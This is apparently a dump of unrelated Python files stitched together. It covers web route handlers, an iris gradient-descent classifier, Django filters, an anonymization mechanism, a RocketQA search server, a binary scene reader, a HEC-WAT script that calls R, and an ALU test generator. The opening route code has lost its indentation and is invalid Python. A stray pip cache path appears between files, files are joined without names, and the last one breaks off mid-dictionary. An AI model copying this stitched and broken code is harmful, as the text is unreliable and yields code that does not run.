response.text = f"Hello, {name}!"
@app.route("/tell/{name}/{age:d}")
def tellage(request, response, name, age):
response.text = f"Hello, {name}! Your age is {age}."
@app.route("/sum/{num_1:d}/{num_2:d}")
def sum(request, response, num_1, num_2):
total = int(num_1) + int(num_2)
response.text = f"{num_1} + {num_2} = {total}"
@app.route("/books")
class BooksView:
def get(self, req, resp):
resp.text = "Books Page"
def post(self, req, resp):
resp.text = "Endpoint to create a book"
# Testing Django based routes
def handler(req, resp):
    resp.text = "sample"

# Registered imperatively instead of via the decorator.
app.add_route("/sample", handler)
# Testing template route
@app.route("/template")
def template_handler(req, resp):
    # Renders templates/index.html with the given context.
    resp.html = app.template("index.html", context={"name": "Bumbo", "title": "Best Framework"})

@app.route("/json")
def json_handler(req, resp):
    resp.json = {"name": "data", "type": "JSON"}

@app.route("/text")
def text_handler(req, resp):
    resp.text = "This is a simple text"

# Exception handler
@app.route("/exception")
def exception_throwing_handler(request, response):
    # Raises deliberately so custom_exception_handler is exercised.
    raise AssertionError("This handler should not be used.")
# Custom middleware
class SimpleCustomMiddleware(Middleware):
    # Logs every request and response URL passing through the app.
    def process_request(self, req):
        print("Processing request", req.url)

    def process_response(self, req, res):
        print("Processing response", req.url)

app.add_middleware(SimpleCustomMiddleware)
/home/runner/.cache/pip/pool/80/e1/5d/d331d8971e24aeb2c49fdf367ac3ad9b3ddd8e21b40454838608e5bdc2 |
"""TTT4275 Project in Classification"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
from matplotlib import style
import matplotlib.animation as animation
from sklearn.metrics import ConfusionMatrixDisplay
style.use('seaborn-paper')
legends = ["Setosa", "Versicolour", "Virginica"]
attribute_names = ["sepal_length", "sepal_width", "petal_length", "petal_width"]
# One DataFrame per iris class, loaded from the course data set.
iris_data = [
    pd.read_csv("./Iris_TTT4275/class_1", names = attribute_names),
    pd.read_csv("./Iris_TTT4275/class_2", names = attribute_names),
    pd.read_csv("./Iris_TTT4275/class_3", names = attribute_names)]
n_attributes = len(attribute_names)
n_classes = len(iris_data)
dropped_attributes = [] #Any listed attribute dropped.
n_dropped = len(dropped_attributes)
n_attributes -= n_dropped
split_at = 30  # samples per class used for one partition (train or test)
alpha = 0.005  # gradient-descent learning rate
iterations = 500  # cap on training iterations
test_first = True  # if False, train on the last split_at samples instead
tolerated_err = 0.045  # stop training once error rate falls below this
def plot_histogram(iris_data):
    """Plot stacked per-attribute histograms for all three classes.

    Side effect: adds a numeric "class" column to every DataFrame in iris_data.
    """
    bins = np.linspace(0, 10, 100)
    for count, value in enumerate(iris_data):
        value["class"] = count
    fig, axis = plt.subplots(n_attributes)
    for i in range(n_attributes):
        for j in range(n_classes):
            legend = legends[j]
            axis[i].hist(iris_data[j][attribute_names[i]].to_numpy(), bins=bins,histtype="barstacked", alpha=0.5, label="Class " + legend, edgecolor="k")
            axis[i].legend(loc='upper right')
            axis[i].set_title(attribute_names[i])
            axis[i].set_ylabel("n")
            axis[i].set_xlabel("mm")
    axis[0].set_ylim([0, 15])
    axis[1].set_ylim([0, 15])
    plt.show()

plot_histogram(iris_data)
def drop_attributes(iris_data, dropped_attributes):
    """Tag each per-class DataFrame with its class index, drop unwanted columns."""
    for class_idx, frame in enumerate(iris_data):
        frame["class"] = class_idx
        iris_data[class_idx] = frame.drop(columns=dropped_attributes)
    return iris_data
iris_data = drop_attributes(iris_data, dropped_attributes)
def split_data(iris_data, split_at, default):
    """Split per-class DataFrames into train/test features and one-hot targets.

    Parameters
    ----------
    iris_data : list of DataFrames, one per class; last column is the class label.
    split_at : number of leading rows per class in the "first" partition.
    default : if True, train on the first `split_at` rows and test on the rest;
              if False, the partitions are swapped.

    Returns
    -------
    (train_x, train_y, test_x, test_y) with one-hot encoded targets.

    The four nearly identical branches of the original are deduplicated, and
    the number of classes is derived from len(iris_data) instead of relying
    on the module-level `n_classes` global (identical value in this script).
    """
    n_cls = len(iris_data)

    def _one_hot(labels):
        # One row per sample; column `round(label)` set to 1.
        onehot = np.zeros((labels.shape[0], n_cls))
        for i, label in np.ndenumerate(labels):
            onehot[i][round(label)] = 1
        return onehot

    def _stack(rows):
        # Concatenate the chosen rows of every class: features, then targets.
        x = np.concatenate([df.iloc[rows, :-1].to_numpy() for df in iris_data])
        labels = np.concatenate([df.iloc[rows, -1].to_numpy() for df in iris_data])
        return x, _one_hot(labels)

    first, last = slice(0, split_at), slice(split_at, None)
    train_rows, test_rows = (first, last) if default else (last, first)
    train_x, train_y = _stack(train_rows)
    test_x, test_y = _stack(test_rows)
    return train_x, train_y, test_x, test_y
train_x, train_y, test_x, test_y = split_data(iris_data, split_at, test_first)
W = np.zeros((n_classes, n_attributes))
w_0 = np.zeros((n_classes,))
def sigmoid(x):
    """Elementwise logistic function 1 / (1 + e^-x)."""
    z = np.exp(-x)
    return np.array(1 / (1 + z))
def prediction(x, W, w_0):
    """Per-sample class activations: sigmoid(W @ x_i + w_0) for every row of x."""
    rows = []
    for sample in x:
        rows.append(sigmoid(np.matmul(W, sample) + w_0))
    return np.array(rows)
def MSE(pred, y):
    """Mean square error: sum of squared errors divided by the sample count."""
    err = pred - y
    return np.sum(np.matmul(err.T, err)) / pred.shape[0]
def train_W_b(pred, y, x, W, w_0, alpha):
    """One gradient-descent step on (W, w_0) for the MSE loss.

    pred : sigmoid outputs, shape (n_samples, n_classes)
    y    : one-hot targets, same shape
    x    : inputs, shape (n_samples, n_attributes)
    Returns the updated (W, w_0) pair; inputs are not modified.
    """
    pred_error = pred - y
    # Sigmoid derivative expressed via its output: g' = g * (1 - g).
    pred_z_error = np.multiply(pred,(1-pred))
    squarebracket = np.multiply(pred_error, pred_z_error)
    dW = np.zeros(W.shape)
    # Gradient of MSE with respect to W
    for i in range (x.shape[0]):
        dW = np.add(dW, np.outer(squarebracket[i], x[i]))
    dw_0 = np.sum(squarebracket, axis=0)
    return ((W-alpha*dW), (w_0-alpha*dw_0))
# NOTE(review): this rebinding shadows the `figure` imported from
# matplotlib.pyplot at the top of the file.
figure = plt.figure()
axis = figure.add_subplot(1,1,1)
# Arrays for storing plot values
plot_iteration = []
train_errors = []
test_errors = []
# Training error rate; updated globally by run(). 1 means "untrained".
error_rate = 1
def get_error_rate(x, y, W, w_0):
    """Fraction of samples whose predicted class differs from the target class."""
    pred = prediction(x, W, w_0)
    wrong = 0
    for target, guess in zip(y, pred):
        if np.argmax(target) != np.argmax(guess):
            wrong += 1
    return wrong / pred.shape[0]
def gen():
    """Frame generator: yield iteration numbers until converged or capped."""
    global error_rate
    step = 0
    # error_rate is updated by run() between yields.
    while error_rate >= tolerated_err and step < iterations:
        step += 1
        yield step
def run(i):
    """Animation callback: record errors, redraw the curves, take one training step.

    Mutates the module-level W, w_0 and error_rate, and appends to the
    plot history lists.
    """
    global W
    global w_0
    global error_rate
    error_rate = get_error_rate(train_x, train_y, W, w_0)
    print(error_rate)
    train_prediction = prediction(train_x, W, w_0)
    test_prediction = prediction(test_x, W, w_0)
    train_error = MSE(train_prediction, train_y)
    test_error = MSE(test_prediction, test_y)
    #print(test_error)
    #print(train_error)
    plot_iteration.append(float(i))
    train_errors.append(train_error)
    test_errors.append(test_error)
    axis.clear()
    # Blue: training MSE, red: test MSE.
    axis.plot(plot_iteration, train_errors, "blue")
    axis.plot(plot_iteration, test_errors, "red")
    W, w_0 = train_W_b(train_prediction, train_y, train_x, W, w_0, alpha)
def generate_confusion_matrix(x, y, W, w_0):
    """Confusion matrix of counts: rows are true classes, columns predictions."""
    pred = prediction(x, W, w_0)
    matrix = np.zeros((n_classes, n_classes))
    for target, guess in zip(y, pred):
        matrix[np.argmax(target)][np.argmax(guess)] += 1
    return matrix
# Animate training: run() performs one gradient step per frame until gen() stops.
animate = animation.FuncAnimation(figure, run, interval=16, frames=gen, repeat = False)
print(W)
plt.show()
# Report final error rates and confusion matrices for both partitions.
print("Error rate train")
print(get_error_rate(train_x, train_y, W, w_0))
print("Confusion matrix train")
confusion_matrix_train = generate_confusion_matrix(train_x,train_y, W, w_0)
print(confusion_matrix_train)
disp = ConfusionMatrixDisplay(confusion_matrix_train, display_labels=legends)
disp.plot()
print("Error rate test")
print(get_error_rate(test_x, test_y, W, w_0))
confusion_matrix_test = generate_confusion_matrix(test_x,test_y, W, w_0)
print("Confusion matrix test")
print(confusion_matrix_test)
disp2 = ConfusionMatrixDisplay(confusion_matrix_test, display_labels=legends)
disp2.plot()
plt.show()
# -*- coding: utf-8 -*-
from django import template
from .datetime_filter import format_time
register = template.Library()
@register.filter(name='find_special_time_by_event')
def find_special_time_by_event(special_results, event):
    """Return the formatted time of the result matching *event*, or 0 if none."""
    match = next((r for r in special_results if r.event == event), None)
    if match is None:
        return 0
    return format_time(match.time)
@register.filter(name='calculate_percentage')
def calculate_percentage(result, special_results):
    """Personal best as a percentage of the matching special result's time.

    Returns e.g. "104.2%"; an empty string when no special result matches
    the event of *result*.
    """
    for special_result in special_results:
        if result.event.pk == special_result.event.id:
            # total_seconds() also counts the days component of a timedelta,
            # which the old `seconds + microseconds / 1e6` arithmetic dropped.
            personal_best = result.time.total_seconds()
            special_result_time = special_result.time.total_seconds()
            percentage = round(personal_best / special_result_time * 100, 1)
            return str(percentage) + '%'
    return ""
|
import glob, unittest
from inspect import getmembers, isclass

# Lists every test case discovered in test_*.py as "module.Class.test_name".
loader = unittest.TestLoader()
for modname in (n[:-3] for n in glob.glob('test_*.py')):
    for suite in loader.loadTestsFromName(modname):
        if suite.countTestCases():
            cls = list(suite)[0].__class__
            tests = loader.getTestCaseNames(cls)
            if tests:
                for n in tests:
                    # Parenthesized print is valid under both Python 2 and 3;
                    # the old bare print statements were Python-2-only syntax.
                    print('%s.%s.%s' % (modname, cls.__name__, n))
            else:
                print('%s.%s' % (modname, cls.__name__))
|
from .measurement_parameters import Parameter
from .measurement_procedure import Procedure
from .publisher import Publisher
|
from typing import Union, Callable
from pydantic.types import constr
from .stateful_mechanism import StatefulMechanism
from ..utils.pydantic_base_model import CamelBaseModel
class Suppression(StatefulMechanism):
    """
    The suppression mechanisms anonymizes input by replacing it with a fixed string of the same or custom length.
    This mechanisms takes two, optional parameters: `suppression_char` and `custom_length`.
    The `suppression_char` parameter defines the character to be used for suppression (default: 'X').
    >>> mechanism = Suppression(suppression_char='Y')
    >>> mechanism.anonymize('test')
    'YYYY'
    The `custom_length` parameter defines the length of the suppressed output.
    If the `custom_length` parameter is not set, the length of the input is preserved.
    That means that the input 'foobar' will result in an anonymized output 'XXXXXX'.
    If the `custom_length` parameter is set to 3, the output will be 'XXX' independent of the input.
    To support randomized lengths, this parameter is allowed to be a function that takes
    the input length as a parameter.
    >>> mechanism = Suppression(custom_length=3)
    >>> mechanism.anonymize('foobar')
    'XXX'
    >>> mechanism = Suppression(custom_length=lambda x: x + 1)
    >>> mechanism.anonymize('foobar')
    'XXXXXXX'
    """

    # Character repeated to build the suppressed output.
    suppression_char: str = "X"
    # Fixed output length, or a callable mapping input length -> output length.
    custom_length: Union[int, Callable[[int], int], None] = None

    class Config:
        @staticmethod
        def schema_extra(schema):
            # manually add the customLength property which is ignored by pydantic because it accepts callables
            schema["properties"]["customLength"] = {"title": "CustomLength", "type": "integer"}

    def __length(self, input_len):
        """
        Determines the length of the suppressed output based on a potentially defined custom length
        and the input length.
        """
        # NOTE(review): a negative int falls through to the input length, and
        # booleans also pass the isinstance(int) check — confirm both intended.
        if isinstance(self.custom_length, int) and self.custom_length >= 0:
            return self.custom_length
        elif callable(self.custom_length):
            return self.custom_length(input_len)
        else:
            return input_len

    def apply(self, input_value):
        """
        Anonymizes the given input parameter by suppressing it.
        """
        output_len = self.__length(len(input_value))
        return self.suppression_char * output_len
class SuppressionParameters(CamelBaseModel):
    """Wire-format wrapper pairing the mechanism discriminator with its config."""
    # Discriminator field: must be exactly the string "suppression".
    mechanism: constr(regex="^suppression$") = "suppression"
    config: Suppression
|
import os
import sys
import json
import faiss
import numpy as np
from tornado import web
from tornado import ioloop
import rocketqa
class FaissTool():
    """Thin wrapper around a FAISS index plus an id -> passage-text table.

    Args:
        text_filename: path to a file with one passage per line; the line
            number is the FAISS passage id.
        index_filename: path to a serialized FAISS index.
    """

    def __init__(self, text_filename, index_filename):
        self.engine = faiss.read_index(index_filename)
        # fix: close the text file deterministically (the original
        # `for line in open(...)` leaked the file handle)
        with open(text_filename) as fin:
            self.id2text = [line.strip() for line in fin]

    def search(self, q_embs, topk=5):
        """Return the texts of the top-k nearest passages for the first query.

        Args:
            q_embs: 2-D array of query embeddings; only row 0 is used.
            topk: number of passages to return.
        """
        _, res_pid = self.engine.search(q_embs, topk)
        return [self.id2text[pid] for pid in res_pid[0][:topk]]
class RocketQAServer(web.RequestHandler):
    """Tornado handler implementing retrieve-then-rerank QA.

    Expects handler kwargs ``faiss_tool``, ``dual_encoder`` and
    ``cross_encoder``, injected via the Application route definition.
    """

    def __init__(self, application, request, **kwargs):
        web.RequestHandler.__init__(self, application, request)
        self._faiss_tool = kwargs["faiss_tool"]
        self._dual_encoder = kwargs["dual_encoder"]
        self._cross_encoder = kwargs["cross_encoder"]

    def get(self):
        """GET is intentionally a no-op; the service is POST-only."""

    def post(self):
        """Answer a JSON request {"query": ..., "topk": ...} with
        {"error_code", "error_message", "answer": [...]}, answers sorted by
        cross-encoder score, best first.
        """
        output = {'error_code': 0, 'error_message': '', 'answer': []}
        input_request = self.request.body
        # fix: an empty body is b'', not None — the original `is None`
        # check could never fire, so empty input fell through to error 2
        if not input_request:
            output['error_code'] = 1
            output['error_message'] = "Input is empty"
            self.write(json.dumps(output))
            return
        try:
            input_data = json.loads(input_request)
        # fix: narrow the bare `except:` to JSON decoding failures
        except (ValueError, TypeError):
            output['error_code'] = 2
            output['error_message'] = "Load input request error"
            self.write(json.dumps(output))
            return
        if "query" not in input_data:
            output['error_code'] = 3
            output['error_message'] = "[Query] is missing"
            self.write(json.dumps(output))
            return
        query = input_data['query']
        topk = input_data.get('topk', 5)
        # dense retrieval: embed the query and fetch candidate passages
        q_embs = np.array(list(self._dual_encoder.encode_query(query=[query])))
        search_result = self._faiss_tool.search(q_embs, topk)
        titles, paras = [], []
        for hit in search_result:
            # each hit is "title<TAB>para"; split only on the first tab so
            # paragraphs containing tabs survive (the original unpack raised)
            title, para = hit.split('\t', 1)
            titles.append(title)
            paras.append(para)
        queries = [query] * len(paras)
        ranking_score = list(self._cross_encoder.matching(query=queries,
                                                          para=paras,
                                                          title=titles))
        # fix: sort (score, title, para) triples directly — the original
        # keyed a dict on query+title+para, silently dropping duplicates
        ranked = sorted(zip(ranking_score, titles, paras),
                        key=lambda item: item[0], reverse=True)
        for score, title, para in ranked:
            output['answer'].append({'probability': score,
                                     'title': title,
                                     'para': para})
        self.write(json.dumps(output, ensure_ascii=False))
def create_rocketqa_app(sub_address, rocketqa_server, language, data_file, index_file):
    """Create RocketQA server application.

    Loads the dual and cross encoders for the requested language ('zh' uses
    the DuReader models, anything else the MS MARCO models), builds the
    FAISS tool, and wires everything into a Tornado Application.
    """
    if language == 'zh':
        de_model, ce_model = 'zh_dureader_de_v2', 'zh_dureader_ce_v2'
    else:
        de_model, ce_model = 'v1_marco_de', 'v1_marco_ce'
    # both encoders share the same runtime configuration
    runtime_conf = {"use_cuda": True, "device_id": 0, "batch_size": 32}
    dual_encoder = rocketqa.load_model(model=de_model, **runtime_conf)
    cross_encoder = rocketqa.load_model(model=ce_model, **runtime_conf)
    faiss_tool = FaissTool(data_file, index_file)
    print('Load index done')
    handler_kwargs = dict(faiss_tool=faiss_tool,
                          dual_encoder=dual_encoder,
                          cross_encoder=cross_encoder)
    return web.Application([(sub_address, rocketqa_server, handler_kwargs)])
if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("USAGE: ")
        print("    python3 rocketqa_service.py ${language} ${data_file} ${index_file}")
        print("--For Example:")
        print("    python3 rocketqa_service.py zh ../data/dureader.para test.index")
        # fix: exit with a non-zero status on usage error (exit() returned 0)
        sys.exit(1)
    language = sys.argv[1]
    if language not in ('en', 'zh'):
        print("illegal language, only [zh] and [en] is supported", file=sys.stderr)
        sys.exit(1)
    data_file = sys.argv[2]
    index_file = sys.argv[3]
    sub_address = r'/rocketqa'
    # fix: pass the port as an int — Tornado's listen() expects a port number
    port = 8888
    app = create_rocketqa_app(sub_address, RocketQAServer, language, data_file, index_file)
    app.listen(port)
    ioloop.IOLoop.current().start()
|
import struct
import csv
import os
import numpy as np
import math
class BinaryReaderEOFException(Exception):
    """Raised when a read requests more bytes than the file still holds."""

    def __str__(self):
        return 'Not enough bytes in file to satisfy read request'
class BinaryReader(object):
    """Sequential binary file reader built on :mod:`struct`.

    Uses struct's native byte order and sizes — NOTE(review): assumes the
    file was written on a platform with matching endianness; confirm.
    """

    def __init__(self, filename):
        self.file = open(filename, 'rb')
        # friendly type name -> struct format character
        self.typeNames = {
            'int8': 'b',
            'uint8': 'B',
            'int16': 'h',
            'uint16': 'H',
            'int32': 'i',
            'uint32': 'I',
            'int64': 'q',
            'uint64': 'Q',
            'float': 'f',
            'double': 'd',
            'char': 's'}

    def read(self, typeName, times=1):
        """Read ``times`` values of ``typeName`` (case-insensitive).

        Returns:
            The unpacked values as a tuple (even for a single value).

        Raises:
            BinaryReaderEOFException: if the file ends before the
                requested number of bytes could be read.
        """
        typeFormat = self.typeNames[typeName.lower()] * times
        typeSize = struct.calcsize(typeFormat)
        value = self.file.read(typeSize)
        if typeSize != len(value):
            raise BinaryReaderEOFException
        return struct.unpack(typeFormat, value)

    def close(self):
        """Close the underlying file handle."""
        self.file.close()

    # new (backward-compatible): context-manager support so the handle is
    # released even when a read raises
    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()
        return False
class gt_reader(object):
    """Reader for ground-truth ``.scene`` files (volume grid + boxes + masks).

    Args:
        base_path: directory containing the ``<name>.scene`` files.
        labelset: optional CSV path mapping ``nyu40id`` to
            ``mappedIdConsecutive``; when given, a remap table is loaded.
    """

    def __init__(self, base_path, labelset=None):
        self.base_path = base_path
        # fix: identity comparison with None instead of `!=`
        if labelset is not None:
            self.mapping = self.load_mapping(labelset)
        # boxes above this height are discarded and the volume is cropped
        # to it — NOTE(review): applied to the 3rd data axis; confirm axis
        self.maxHeight = 48

    def load_mapping(self, label_file):
        """Load the nyu40id -> consecutive-id mapping from a CSV file."""
        mapping = dict()
        # first weight for background
        # fix: close the CSV deterministically via a context manager
        with open(label_file) as csvfile:
            for row in csv.DictReader(csvfile, delimiter=','):
                mapping[int(row['nyu40id'])] = int(row['mappedIdConsecutive'])
        return mapping

    def get_gt(self, name, labelset=None):
        """Read one scene: volume data, kept boxes and their masks.

        NOTE(review): here ``labelset`` acts as a flag enabling the remap
        loaded in ``__init__`` — unlike ``__init__`` where it is a path.
        """
        # read out data: dims, then the dense float grid in Fortran order
        reader = BinaryReader(os.path.join(self.base_path, name + '.scene'))
        data_dimX, data_dimY, data_dimZ = reader.read('UINT64', 3)
        data = reader.read('float', data_dimX * data_dimY * data_dimZ)
        data = np.expand_dims(np.reshape(data, (data_dimX, data_dimY, data_dimZ), order='F'), 0).astype(np.float32)
        # NOTE(review): np.abs makes values non-negative, so the lower clip
        # bound of -3 is inert; the upper bound caps values at 3
        abs_data = np.clip(np.abs(data), -3, 3)
        (num_box,) = reader.read('uint32')
        gt_box = []
        gt_box_ids = []
        for i in range(num_box):
            # gt_box: axis-aligned box extents followed by its label id
            minx, miny, minz, maxx, maxy, maxz = reader.read('float', 6)
            (labelid,) = reader.read('uint32')
            # keep only boxes entirely below the height crop
            if maxy <= self.maxHeight and miny <= self.maxHeight:
                # fix: identity comparison with None instead of `!=`
                if labelset is not None:
                    labelid = self.mapping[labelid]
                gt_box.append([math.floor(minx), math.floor(miny), math.floor(minz), math.ceil(maxx), math.ceil(maxy), math.ceil(maxz), labelid])
                gt_box_ids.append(i)
        gt_box = np.array(gt_box)
        gt_mask = []
        (num_mask,) = reader.read('uint32')
        for i in range(num_mask):
            # masks are stored for every box; only keep those whose box survived
            # NOTE(review): assumes mask i corresponds to box i — confirm format
            (labelid,) = reader.read('uint32')
            dimX, dimY, dimZ = reader.read('UINT64', 3)
            mask_data = reader.read('uint16', dimX * dimY * dimZ)
            if i in gt_box_ids:
                mask_data = np.reshape(mask_data, (dimX, dimY, dimZ), order='F').astype(np.uint8)
                # binarize: anything above 1 is treated as background
                mask_data[mask_data > 1] = 0
                gt_mask.append(mask_data)
        # dict return
        dict_return = {
            'id': name,
            'data': abs_data[:, :, :self.maxHeight, :],
            'gt_box': gt_box,
            'gt_mask': gt_mask,
            'dim': (data_dimX, data_dimY, data_dimZ)
        }
        reader.close()
        return dict_return
|
"""
Example Script for writing a timeseries CSV and launching an external R script via a system call. Could be adapted to many other models.
"""
import os
import json
from csv import DictWriter
from hec.script import Constants
from hec.heclib.util import HecTime
from hec.hecmath import TimeSeriesMath
def callR(scriptFile, args=None):
    """Invoke Rscript on *scriptFile*, passing *args* as CLI arguments.

    Fix: the original used a mutable default (``args=[]``).
    NOTE(review): the command is a shell string passed to os.system;
    arguments containing spaces must be pre-quoted by the caller.
    """
    if args is None:
        args = []
    os.system(RScriptExe + " " + scriptFile + " " + " ".join(args))
def getOutputDir(opts):
    """Return the output directory for this compute, creating it if missing.

    The directory is the run directory's parent with 'Scripting' stripped
    from its name.
    """
    out_dir = os.path.dirname(opts.getRunDirectory()).replace("Scripting", "")
    if not os.path.exists(out_dir):
        os.mkdir(out_dir)
    return out_dir
def writeScriptConfig(alt, opts):
    """Write a JSON configuration file describing this compute for the R script.

    Collects the run time window, (for FRM computes) random values and
    event/lifecycle/realization indices, DSS output details, and the mapped
    input data locations, then dumps everything to ``rScriptConfig.json``
    in the output directory.

    Args:
        alt: the ScriptingAlternative being computed.
        opts: the compute options (hec.wat.model.ComputeOptions).

    Returns:
        Path of the written JSON config file.
    """
    config = dict()
    # create run time window details
    rtw = opts.getRunTimeWindow()
    rtwDict = dict()
    rtwDict["Start Time"] = rtw.getStartTimeString()
    rtwDict["End Time"] = rtw.getEndTimeString()
    config["TimeWindow"] = rtwDict
    ## Save realization and event seeds (FRM computes only)
    if opts.isFrmCompute():
        seedDict = dict()
        # technically these aren't seeds as the dictionary name implies
        seedDict["Event Random"] = opts.getEventRandom()
        seedDict["Realization Random"] = opts.getRealizationRandom()
        seedDict["Lifecycle Random"] = opts.getLifeCycleRandom()
        config["Seeds"] = seedDict
        # position of this compute within the stochastic simulation
        indexDict = dict()
        indexDict["Event Number"] = opts.getCurrentEventNumber()
        indexDict["Lifecycle Number"] = opts.getCurrentLifecycleNumber()
        indexDict["Realization Number"] = opts.getCurrentRealizationNumber()
        config["Indices"] = indexDict
    # get DSS output data:
    outputDict = dict()
    outputDict["Run Directory"] = opts.getRunDirectory()
    outputDict["Simulation Name"] = opts.getSimulationName()
    outputDict["DSS File"] = opts.getDssFilename()
    outputDict["F Part"] = opts.getFpart()
    config["Outputs"] = outputDict
    # create list of locations mapped in
    locations = alt.getInputDataLocations()
    config["locations"] = list()
    for loc in locations:
        locDict = dict()
        locDict["name"] = loc.getName()
        locDict["param"] = loc.getParameter()
        #locDict["type"] = loc.getType()
        #locDict["dssPath"] = loc.getDssPath()
        # log each mapped location so it shows up in the compute log
        alt.addComputeWarningMessage(loc.getName())
        alt.addComputeMessage(loc.getParameter())
        config["locations"].append(locDict)
    # write to file in the shared output directory
    d = getOutputDir(opts)
    configFilename = os.path.join(d, "rScriptConfig.json")
    with open(configFilename, 'w') as out:
        out.write(json.dumps(config))
    return configFilename
def getValueAtTime(tsc, timestamp):
    """Look up the value in *tsc* whose time equals *timestamp*.

    Single linear pass, no interpolation. Returns ``(value, True)`` on an
    exact match, otherwise ``(Constants.UNDEFINED, False)``.
    """
    for tick, value in zip(tsc.times, tsc.values):
        if tick == timestamp:
            return value, True
    return Constants.UNDEFINED, False
def formatTime(t):
    """Render a HecTime-like object as 'M/D/YYYY HH:MM' — the layout the R
    script expects (month/day unpadded, hour/minute zero-padded)."""
    fields = (t.month(), t.day(), t.year(), t.hour(), t.minute())
    return "%d/%d/%d %02d:%02d" % fields
def writeTsCSV(alt, opts, outTimestep=None, timestepColumn="GMT"):
    """Dump every mapped input timeseries to ``obsTimeseries.csv``.

    Each mapped DataLocation is loaded, averaged onto *outTimestep* and
    written as one CSV column; rows are emitted per time step of the run
    time window, skipping rows where no location has a valid value.

    Args:
        alt: the ScriptingAlternative (provides locations and timeseries).
        opts: the compute options (provides the run time window).
        outTimestep: target timestep for the transform; defaults to the
            alternative's own timestep.
        timestepColumn: name of the timestamp column (GMT expected by the
            downstream R script).

    Returns:
        Path of the written CSV file.
    """
    if outTimestep is None: outTimestep = alt.getTimeStep()
    # stash timeseries, one entry per mapped location
    timeseries = dict()
    locationNames = list()
    for loc in alt.getInputDataLocations():
        locationNames.append(loc.getName())
        tsc = alt.loadTimeSeries(loc)
        # average onto the requested timestep ("0M" offset, "AVE" function)
        hm = TimeSeriesMath(tsc).transformTimeSeries(outTimestep, "0M", "AVE")
        timeseries[loc.getName()] = hm.getData()  # back to TSC
        # log every value for traceability in the compute log
        for t, v in zip(timeseries[loc.getName()].times, timeseries[loc.getName()].values):
            ts = HecTime()
            ts.set(t)
            alt.addComputeMessage("\t" + ts.toString(104) + " : " + str(v))
    d = os.path.dirname(opts.getRunDirectory())
    d = d.replace("Scripting", "")
    csvFilename = os.path.join(d, "obsTimeseries.csv")
    # CSV Format is as follows
    # GMT,Loc1,Loc2,Loc3
    # 10/1/1948 12:00,-8.087059,8.087059,-999
    # header column named GMT could be changed with timestepColumn arg, but GMT required for my purpose
    header = [timestepColumn] + locationNames
    # NOTE(review): 'wb' is the Jython/Python-2 csv idiom; on Python 3 this
    # would need mode 'w' with newline=''
    with open(csvFilename, 'wb') as out:
        outCSV = DictWriter(out, header)
        outCSV.writeheader()
        # simply loop through timestamps and output values
        rtw = opts.getRunTimeWindow()
        # optionally set the timestep for output not the alternative's predefined timestep (not required for WAT 1.1.0.682 and greater)
        #rtw.setTimeStep(alt.getTimeStep())
        i = 0
        timestep = rtw.getTimeAtStep(i)
        while timestep < rtw.getEndTime():
            row = dict()
            row[timestepColumn] = formatTime(timestep)
            # use valid row to only write data that exists - hack for mixing up timesteps
            validRow = False
            for loc in locationNames:
                row[loc], validValue = getValueAtTime(timeseries[loc], timestep.value())
                validRow = validRow or validValue
            if validRow:
                alt.addComputeMessage(str(row))
                outCSV.writerow(row)
            i += 1
            timestep = rtw.getTimeAtStep(i)
    return csvFilename
## Scripts to run
# initRScript gets run when this script initializes; not clear if this runs more than once.
initRScript = r"C:\Projects\WAT_R_Test\testInit.R"
# runRScript runs with access to computeOptions and currentAlternative objects
runRScript = r"C:\Projects\WAT_R_Test\testRun.R"
# R executable — pre-quoted because the path contains spaces and is passed
# through a shell via os.system in callR
RScriptExe = "\"C:\\Program Files\\R\\R-4.1.2\\bin\\Rscript.exe\""
## Init R Script (optional)
#callR(initRScript)
##
#
# computeAlternative function is called when the ScriptingAlternative is computed.
# Arguments:
# currentAlternative - the ScriptingAlternative. hec2.wat.plugin.java.impl.scripting.model.ScriptPluginAlt
# computeOptions - the compute options. hec.wat.model.ComputeOptions
#
# return True if the script was successful, False if not.
# no explicit return will be treated as a successful return
#
##
def computeAlternative(currentAlternative, computeOptions):
    """Entry point invoked when the ScriptingAlternative is computed.

    Writes the JSON config and the timeseries CSV, then launches the R run
    script with both file paths as arguments. Returns True on success.
    """
    currentAlternative.addComputeMessage("Computing ScriptingAlternative:" + currentAlternative.getName())
    # config JSON tells the R script about the time window and mapped locations;
    # the script is expected to find this file
    configPath = writeScriptConfig(currentAlternative, computeOptions)
    # mapped input DataLocations are dumped to CSV at a daily timestep
    csvPath = writeTsCSV(currentAlternative, computeOptions, outTimestep="1DAY")
    # run the R script with both files as arguments
    callR(runRScript, [configPath, csvPath])
    return True
|
#! /usr/bin/env python3
from common import *
# 16 random operand-A values (random immediates from common.randImmI).
test_vector_a = [randImmI() for x in range(2**4)]
# Operand B depends on the opcode at the same index: shift ops get a legal
# shift amount, ADD4A gets the constant 4, everything else a random immediate.
test_vector_b = [
    randShamt() if x in [AluTypes.SLL.value,AluTypes.SRL.value,AluTypes.SRA.value]
    else 4 if x in [AluTypes.ADD4A.value]
    else randImmI() for x in range(2**4)
]
# One test vector per ALU opcode (0..15).
test_vector_op = [x for x in range(2**4)]
if __name__ == "__main__":
    # Stimulus file: each line is operand A (32b) | operand B (32b) | op (5b).
    outfile = f"{basenameNoExt('build', __file__)}.mem"
    with open(outfile, 'w') as fp:
        for a, b, op in zip(test_vector_a, test_vector_b, test_vector_op):
            # NOTE(review): op is masked to 4 bits but padded to 5 — confirm
            # the op field really is 5 bits wide
            line = f"{a & 0xffffffff:032b}{b & 0xffffffff:032b}{op & 0xf:05b}"
            print(line, file=fp)

    # Golden model: one lambda per opcode producing the expected 32-bit result
    # (comparison ops yield a bool, which formats as 0/1).
    golden_ops = {
        AluTypes.ADD.value:   lambda a, b: (a + b) & 0xffffffff,
        AluTypes.SUB.value:   lambda a, b: (a - b) & 0xffffffff,
        AluTypes.SLL.value:   lambda a, b: (a << b) & 0xffffffff,
        AluTypes.XOR.value:   lambda a, b: (a ^ b) & 0xffffffff,
        AluTypes.SRL.value:   lambda a, b: (a & 0xffffffff) >> (b & 0xffffffff),
        AluTypes.SRA.value:   lambda a, b: (a >> b) & 0xffffffff,
        AluTypes.OR.value:    lambda a, b: (a | b) & 0xffffffff,
        AluTypes.AND.value:   lambda a, b: (a & b) & 0xffffffff,
        AluTypes.PASSB.value: lambda a, b: b & 0xffffffff,
        AluTypes.ADD4A.value: lambda a, b: (a + 4) & 0xffffffff,
